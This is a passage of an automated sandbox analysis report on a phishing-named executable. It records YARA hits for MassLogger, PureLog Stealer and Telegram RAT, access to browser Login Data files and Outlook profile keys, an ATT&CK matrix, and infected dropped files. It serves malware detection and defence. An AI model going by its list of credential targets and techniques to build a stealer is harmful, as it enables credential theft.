Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TSTFD94.tmp VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe

Code function: 8_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

8_2_00412A15

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe

8_2_02BF8550

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.Microsofts.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO_2024_056209_MQ04865_ENQ_1045.exe PID: 8160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Microsofts.exe PID: 2124, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED

Yara detected PureLog Stealer

Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49a6478.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49a6478.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3573f56.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.5ae0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49a5570.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3574e5e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3573f56.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3574e5e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49e3d90.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49a5570.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3700f08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3700000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49e3d90.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.5ae0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3700000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3700f08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1769417350.0000000003700000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1793222374.00000000049A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1758588393.0000000003533000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1798563262.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.Microsofts.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO_2024_056209_MQ04865_ENQ_1045.exe PID: 8160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Microsofts.exe PID: 2124, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.Microsofts.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2962626553.0000000002633000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO_2024_056209_MQ04865_ENQ_1045.exe PID: 8160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Microsofts.exe PID: 2124, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.Microsofts.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO_2024_056209_MQ04865_ENQ_1045.exe PID: 8160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Microsofts.exe PID: 2124, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED

Yara detected PureLog Stealer

Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49a6478.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49a6478.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3573f56.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.5ae0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49a5570.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3574e5e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3573f56.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3574e5e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49e3d90.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49a5570.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3700f08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3700000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49e3d90.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.5ae0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3700000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3700f08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1769417350.0000000003700000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1793222374.00000000049A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1758588393.0000000003533000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1798563262.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.Microsofts.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO_2024_056209_MQ04865_ENQ_1045.exe PID: 8160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Microsofts.exe PID: 2124, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	13 Native API	2 LSASS Driver	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	1 Taint Shared Content	11 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	2 LSASS Driver	11 Deobfuscate/Decode Files or Information	111 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Service Execution	1 Windows Service	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Scheduled Task/Job	1 Windows Service	4 Obfuscated Files or Information	NTDS	24 System Information Discovery	Distributed Component Object Model	1 Email Collection	15 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	2 Registry Run Keys / Startup Folder	11 Process Injection	1 Direct Volume Access	LSA Secrets	131 Security Software Discovery	SSH	111 Input Capture	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	12 Software Packing	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	2 Registry Run Keys / Startup Folder	1 Timestomp	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	222 Masquerading	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	31 Virtualization/Sandbox Evasion	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	11 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PO_2024_056209_MQ04865_ENQ_1045.exe	42%	ReversingLabs	Win32.Trojan.Mailer
PO_2024_056209_MQ04865_ENQ_1045.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Check.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	100%	Avira	W32/Infector.Gen
